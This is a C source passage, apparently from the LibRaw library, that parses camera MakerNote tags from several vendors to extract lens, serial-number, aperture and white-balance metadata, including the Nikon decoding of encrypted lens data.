my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[1]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
}
if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
{
if (buf[0x3d] | buf[0x3c])
{
lid = SonySubstitution[buf[0x3d]] << 8 |
SonySubstitution[buf[0x3c]];
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/256.0f - 16.0f) / 2.0f);
}
if (buf[0x105] &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
imgdata.lens.makernotes.LensMount =
SonySubstitution[buf[0x105]];
if (buf[0x106])
imgdata.lens.makernotes.LensFormat =
SonySubstitution[buf[0x106]];
}
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
parseSonyLensType2 (SonySubstitution[buf[0x0108]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0107]]);
}
if ((imgdata.lens.makernotes.LensID == -1) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) &&
(buf[0x010a] | buf[0x0109]))
{
imgdata.lens.makernotes.LensID = // LensType - Minolta/Sony lens ids
SonySubstitution[buf[0x010a]] << 8 |
SonySubstitution[buf[0x0109]];
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
}
if ((id >= 286) && (id <= 293))
// "SLT-A65", "SLT-A77", "NEX-7", "NEX-VG20E",
// "SLT-A37", "SLT-A57", "NEX-F3", "Lunar"
parseSonyLensFeatures (SonySubstitution[buf[0x115]],
SonySubstitution[buf[0x116]]);
else if (imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens)
parseSonyLensFeatures(SonySubstitution[buf[0x116]], SonySubstitution[buf[0x117]]);
if ((id == 347) || (id == 350) || (id == 357))
{
unsigned long long b88 = SonySubstitution[buf[0x88]];
unsigned long long b89 = SonySubstitution[buf[0x89]];
unsigned long long b8a = SonySubstitution[buf[0x8a]];
unsigned long long b8b = SonySubstitution[buf[0x8b]];
unsigned long long b8c = SonySubstitution[buf[0x8c]];
unsigned long long b8d = SonySubstitution[buf[0x8d]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%06llx",
(b88 << 40) + (b89 << 32) + (b8a << 24) + (b8b << 16) + (b8c << 8) + b8d);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Minolta_A) && (id > 279) && (id != 282) && (id != 283))
{
unsigned long long bf0 = SonySubstitution[buf[0xf0]];
unsigned long long bf1 = SonySubstitution[buf[0xf1]];
unsigned long long bf2 = SonySubstitution[buf[0xf2]];
unsigned long long bf3 = SonySubstitution[buf[0xf3]];
unsigned long long bf4 = SonySubstitution[buf[0xf4]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%05llx",
(bf0 << 32) + (bf1 << 24) + (bf2 << 16) + (bf3 << 8) + bf4);
}
else if ((imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E) && (id != 288) && (id != 289) && (id != 290))
{
unsigned b7c = SonySubstitution[buf[0x7c]];
unsigned b7d = SonySubstitution[buf[0x7d]];
unsigned b7e = SonySubstitution[buf[0x7e]];
unsigned b7f = SonySubstitution[buf[0x7f]];
sprintf(imgdata.shootinginfo.InternalBodySerial, "%04x", (b7c << 24) + (b7d << 16) + (b7e << 8) + b7f);
}
return;
}
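// MakerNote parser used when the note is reached through DNG private data
// (tag 0xc634): identify the vendor sub-header, then walk the IFD entries and
// dispatch each tag to the vendor-specific handlers above.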
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
unsigned ver97 = 0, offset = 0, entries, tag, type, len, save, c;
unsigned i;
uchar NikonKey, ci, cj, ck;
unsigned serial = 0;
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
short morder, sorder = order;
char buf[10];
INT64 fsize = ifp->size();
fread(buf, 1, 10, ifp);
if (!strcmp(buf, "Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek(ifp, offset - 8, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMPUS") ||
!strcmp(buf, "PENTAX ") ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG))) {
base = ftell(ifp) - 10;
fseek(ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
}
else if (!strncmp(buf, "SONY", 4) ||
!strcmp(buf, "Panasonic")) {
goto nf;
}
else if (!strncmp(buf, "FUJIFILM", 8)) {
base = ftell(ifp) - 10;
nf: order = 0x4949;
fseek(ifp, 2, SEEK_CUR);
}
else if (!strcmp(buf, "OLYMP") ||
!strcmp(buf, "LEICA") ||
!strcmp(buf, "Ricoh") ||
!strcmp(buf, "EPSON"))
fseek(ifp, -2, SEEK_CUR);
else if (!strcmp(buf, "AOC") ||
!strcmp(buf, "QVC"))
fseek(ifp, -4, SEEK_CUR);
else {
fseek(ifp, -10, SEEK_CUR);
if ((!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG)))
base = ftell(ifp);
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get(base, &tag, &type, &len, &save);
INT64 pos = ifp->tell();
if(len > 8 && pos+len > 2* fsize) continue;
tag |= uptag << 16;
if(len > 100*1024*1024) goto next; // 100Mb tag? No!
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4))
parseFujiMakernotes (tag, type);
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len,ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON", 5))
{
if (tag == 0x1d) // serial number
while ((c = fgetc(ifp)) && c != EOF)
{
if ((!custom_serial) && (!isdigit(c)))
{
if ((strbuflen(model) == 3) && (!strcmp(model,"D50")))
{
custom_serial = 34;
}
else
{
custom_serial = 96;
}
}
serial = serial*10 + (isdigit(c) ? c - '0' : c % 10);
}
else if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0097)
{
for (i=0; i < 4; i++)
ver97 = ver97 * 10 + fgetc(ifp)-'0';
if (ver97 == 601) // Coolpix A
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0xa7) // shutter count
{
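// Tag 0xa7 (shutter count) supplies the final key byte; Nikon LensData
// versions 201+ are decrypted here with the xlat[] tables, keyed by the body
// serial number and NikonKey, before being passed to processNikonLensData().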
NikonKey = fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp) ^ fgetc(ifp);
if ((NikonLensDataVersion > 200) && lenNikonLensData)
{
if (custom_serial)
{
ci = xlat[0][custom_serial];
}
else
{
ci = xlat[0][serial & 0xff];
}
cj = xlat[1][NikonKey];
ck = 0x60;
for (i = 0; i < lenNikonLensData; i++)
table_buf[i] ^= (cj += ci * ck++);
processNikonLensData(table_buf, lenNikonLensData);
lenNikonLensData = 0;
free(table_buf);
}
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
else if (tag == 37 && (!iso_speed || iso_speed == 65535))
{
unsigned char cc;
fread(&cc, 1, 1, ifp);
iso_speed = (int)(100.0 * libraw_powf64(2.0, (double)(cc) / 12.0 - 5.0));
break;
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
int SubDirOffsetValid =
strncmp (model, "E-300", 5) &&
strncmp (model, "E-330", 5) &&
strncmp (model, "E-400", 5) &&
strncmp (model, "E-500", 5) &&
strncmp (model, "E-1", 3);
if ((tag == 0x2010) || (tag == 0x2020))
{
fseek(ifp, save - 4, SEEK_SET);
fseek(ifp, base + get4(), SEEK_SET);
parse_makernote_0xc634(base, tag, dng_writer);
}
if (!SubDirOffsetValid &&
((len > 4) ||
( ((type == 3) || (type == 8)) && (len > 2)) ||
( ((type == 4) || (type == 9)) && (len > 1)) || (type == 5) || (type > 9)))
goto skip_Oly_broken_tags;
switch (tag) {
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20100102:
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x20100201:
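// LensID is assembled from the maker, model and sub-model bytes; the comma
// expression intentionally drops the unused second byte of the field.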
imgdata.lens.makernotes.LensID =
(unsigned long long)fgetc(ifp)<<16 |
(unsigned long long)(fgetc(ifp), fgetc(ifp))<<8 |
(unsigned long long)fgetc(ifp);
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
if ((!imgdata.lens.LensSerial[0]))
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens,len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment,len, ifp);
break;
case 0x20200401:
imgdata.other.FlashEC = getreal(type);
break;
}
skip_Oly_broken_tags:;
}
else if (!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && (dng_writer == CameraDNG)))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 12, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7) &&
(dng_writer == AdobeDNG))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
imgdata.lens.makernotes.CamID = unique_id = get4();
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len) {
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (saneSonyCameraInfo(table_buf[0], table_buf[3], table_buf[2], table_buf[5], table_buf[4], table_buf[7]))
{
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
if (table_buf[7])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
}
break;
default:
// CameraInfo2 & 3
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
}
free(table_buf);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 65535) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len < 256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (saneSonyCameraInfo(table_buf[1], table_buf[2], table_buf[3], table_buf[4], table_buf[5], table_buf[6]))
{
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
free(table_buf);
}
}
next:
fseek (ifp, save, SEEK_SET);
}
quit:
order = sorder;
}
#else
void CLASS parse_makernote_0xc634(int base, int uptag, unsigned dng_writer)
{
/*placeholder */
}
#endif
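// MakerNote parser for the regular EXIF path; handles the same vendors as
// parse_makernote_0xc634() above, plus the Konica/Minolta white-balance scan
// and the Leica base-offset adjustments.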
void CLASS parse_makernote (int base, int uptag)
{
unsigned offset=0, entries, tag, type, len, save, c;
unsigned ver97=0, serial=0, i, wbi=0, wb[4]={0,0,0,0};
uchar buf97[324], ci, cj, ck;
short morder, sorder=order;
char buf[10];
unsigned SamsungKey[11];
uchar NikonKey;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned custom_serial = 0;
unsigned NikonLensDataVersion = 0;
unsigned lenNikonLensData = 0;
unsigned NikonFlashInfoVersion = 0;
uchar *CanonCameraInfo;
unsigned lenCanonCameraInfo = 0;
uchar *table_buf;
uchar *table_buf_0x9050;
ushort table_buf_0x9050_present = 0;
uchar *table_buf_0x940c;
ushort table_buf_0x940c_present = 0;
INT64 fsize = ifp->size();
#endif
/*
The MakerNote might have its own TIFF header (possibly with
its own byte-order!), or it might just be a table.
*/
if (!strncmp(make,"Nokia",5)) return;
